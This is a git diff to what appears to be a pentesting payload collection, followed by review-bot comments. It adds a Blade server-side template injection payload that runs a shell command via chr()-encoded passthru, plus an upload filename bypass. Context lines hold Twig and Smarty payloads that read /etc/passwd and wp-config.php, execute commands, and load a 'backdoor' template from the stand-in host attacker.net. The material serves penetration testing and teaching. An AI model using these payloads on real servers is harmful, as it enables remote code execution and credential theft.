diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index 4e69a37b..0192f55a 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -38,6 +38,7 @@ - [nicholasaleks/CrackQL](https://github.com/nicholasaleks/CrackQL) - A GraphQL password brute-force and fuzzing utility - [nicholasaleks/graphql-threat-matrix](https://github.com/nicholasaleks/graphql-threat-matrix) - GraphQL threat framework used by security professionals to research security gaps in GraphQL implementations - [dolevf/graphql-cop](https://github.com/dolevf/graphql-cop) - Security Auditor Utility for GraphQL APIs +- [dolevf/graphw00f](https://github.com/dolevf/graphw00f) - GraphQL Server Engine Fingerprinting utility - [IvanGoncharov/graphql-voyager](https://github.com/IvanGoncharov/graphql-voyager) - Represent any GraphQL API as an interactive graph - [Insomnia](https://insomnia.rest/) - Cross-platform HTTP and GraphQL Client diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index f8502ad6..cc3618c3 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md 
@@ -21,21 +21,34 @@ ## Templating Libraries -| Template Name | Payload Format | -| -------------- | --------- | -| Laravel Blade | `{{ }}` | -| Latte | `{var $X=""}{$X}` | -| Mustache | `{{ }}` | -| Plates | `` | -| Smarty | `{ }` | -| Twig | `{{ }}` | +| Template Name | Payload Format | +| --------------- | --------- | +| Blade (Laravel) | `{{ }}` | +| Latte | `{var $X=""}{$X}` | +| Mustache | `{{ }}` | +| Plates | `` | +| Smarty | `{ }` | +| Twig | `{{ }}` | + +## Blade + +[Official website](https://laravel.com/docs/master/blade) +> Blade is the simple, yet powerful templating engine that is included with Laravel. + +The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr(114),[105,100]))}}`. + +```php +{{passthru(implode(null,array_map(chr(99).chr(104).chr(114),[105,100])))}} +``` + +--- ## Smarty [Official website](https://www.smarty.net/docs/en/) > Smarty is a template engine for PHP. -```python +```php {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} @@ -52,7 +65,7 @@ ### Twig - Basic Injection -```python +```php {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} @@ -62,7 +75,7 @@ ### Twig - Template Format -```python +```php $output = $twig > render ( 'Dear' . $_GET['custom_greeting'], array("first_name" => $user.first_name) @@ -76,14 +89,14 @@ $output = $twig > render ( ### Twig - Arbitrary File Reading -```python +```php "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{include("wp-config.php")}} ``` ### Twig - Code Execution -```python +```php {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 
@@ -249,4 +262,5 @@ layout template: ## References +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 87137471..056d6057 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -406,3 +406,4 @@ PoC : - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) +- [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 2047d0c3..75f5aa94 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
@@ -102,6 +102,7 @@ Other extensions that can be abused to trigger other vulnerabilities. * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` * Multiple special characters: `file.jsp/././././.` + * UTF8 filename: `Content-Disposition: form-data; name="anyBodyParam"; filename*=UTF8''myfile%0a.txt` * On Windows OS, `include`, `require` and `require_once` functions will convert "foo.php" followed by one or more of the chars `\x20` ( ), `\x22` ("), `\x2E` (.), `\x3C` (<), `\x3E` (>) back to "foo.php". * On Windows OS, `fopen` function will convert "foo.php" followed by one or more of the chars `\x2E` (.), `\x2F` (/), `\x5C` (\) back to "foo.php".
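Review bot: in the new `## Blade` section of `Server Side Template Injection/PHP.md`, `implode(null, ...)` depends on a null separator, which PHP 8.1 and later report as a deprecation (null passed to a non-nullable internal parameter) and which adds nothing to the payload; `implode('', array_map(chr(99).chr(104).chr(114),[105,100]))` is equivalent and runs cleanly on every PHP version. The section also never says why `id` is built from `chr()` calls at all: if a literal string is allowed, `{{passthru('id')}}` is the shorter payload, so state the constraint the encoding works around (quote or keyword filtering) so the reader knows when to reach for it. Finally, one sentence on where the input has to land (compiled as Blade template source, not a value passed into an existing template) would keep this entry consistent with the "Twig - Template Format" subsection below it, which shows that distinction explicitly.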
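Review bot: the new reference in `Server Side Template Injection/PHP.md` is missing the space before the hyphen in `RCE everywhere- YesWeHack`; every other entry in that list separates title, source and date with ` - `, so it should read `RCE everywhere - YesWeHack - March 24, 2025`.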
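Review bot: the new `UTF8 filename` bullet in `Upload Insecure Files/README.md` uses the charset token `UTF8`, but the `ext-value` grammar of RFC 5987 / RFC 8187 is `charset "'" [ language ] "'" value-chars` with the charset `UTF-8`, so the example should be `filename*=UTF-8''myfile%0a.txt` unless the non-standard spelling is a deliberate parser quirk, in which case name the parser. The bullet should also say what the trick achieves: the `%0a` is percent-decoded only when the application reads the RFC 5987 `filename*` parameter, so a validator that inspects the plain `filename=` parameter never sees the newline, while the component that writes the file does. As written it sits in the "other extensions" list with no explanation of which parameter is trusted by which side.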